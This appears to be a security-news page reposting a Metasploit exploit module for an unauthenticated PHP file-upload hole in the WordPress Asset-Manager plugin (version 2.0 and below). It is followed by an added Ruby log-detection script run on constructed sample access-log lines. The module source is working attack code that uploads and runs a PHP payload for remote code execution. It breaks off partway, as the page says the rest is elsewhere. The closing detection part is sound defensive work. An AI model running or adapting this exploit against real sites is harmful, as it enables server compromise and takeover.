WordPress Asset-Manager PHP file upload vulnerability and fix - vulnerability warning - Black Bar Security Net (myhack58)

2012-12-29T00:00:00
ID MYHACK58:62201236445
Type myhack58
Reporter Anonymous
Modified 2012-12-29T00:00:00

Description

This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin's upload.php accepts PHP files and writes them to a temporary directory without any authentication, so an unauthenticated user can upload a file and obtain arbitrary code execution on the server.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to
        the temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"

    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin reads the upload from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # A successful upload answers 200 and echoes the stored file name in the body
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    # (the remainder of the module is on the next page of the original post)

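Detection logic for the request pattern this module leaves in web-server logs, as an added example that is not part of the original post or of the Metasploit module. It assumes combined-format access logs (Apache/nginx) and that the uploaded file is later requested from somewhere under the plugin's own directory, since the page does not name the temp directory; the log lines are constructed.

```ruby
require 'time'

# The upload endpoint named in the module, and any .php file under the plugin directory.
UPLOAD_ENDPOINT = %r{/wp-content/plugins/asset-manager/upload\.php}i
PLUGIN_PHP      = %r{/wp-content/plugins/asset-manager/\S*\.php}i

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Parse one access-log line into a hash, or return nil if it is not in the expected format.
def parse_line(line)
  m = LOG_LINE.match(line) or return nil
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Flag every successful POST to upload.php that the same client follows, within
# `window` seconds, with a request for a .php file inside the plugin directory.
# A plain POST to upload.php is also a signal, but the follow-up request is what
# distinguishes a dropped web shell from a legitimate asset upload.
def find_upload_then_exec(lines, window: 300)
  events = lines.map { |l| parse_line(l) }.compact
  alerts = []
  events.each_with_index do |e, i|
    next unless e[:method] == 'POST' && e[:path] =~ UPLOAD_ENDPOINT && e[:status] == 200
    follow = events.drop(i + 1).find do |f|
      f[:ip] == e[:ip] && f[:path] =~ PLUGIN_PHP && f[:path] !~ UPLOAD_ENDPOINT &&
        (f[:time] - e[:time]).between?(0, window)
    end
    alerts << { ip: e[:ip], upload: e[:path], executed: follow[:path] } if follow
  end
  alerts
end

# Constructed sample lines (not real traffic); the "temp/" subdirectory is assumed.
SAMPLE_LOG = <<~LOG
  203.0.113.5 - - [29/Dec/2012:10:00:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
  203.0.113.5 - - [29/Dec/2012:10:00:02 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 14 "-" "Mozilla/5.0"
  203.0.113.5 - - [29/Dec/2012:10:00:03 +0000] "GET /wordpress/wp-content/plugins/asset-manager/temp/kzqwe.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.9 - - [29/Dec/2012:10:05:00 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 14 "-" "Mozilla/5.0"
  198.51.100.9 - - [29/Dec/2012:10:05:01 +0000] "GET /wordpress/wp-content/plugins/asset-manager/temp/photo.jpg HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
LOG

puts find_upload_then_exec(SAMPLE_LOG.lines).inspect if __FILE__ == $0
```

Only the first client is reported: it fetched a .php file right after the upload, while the second uploaded an image and never requested a script.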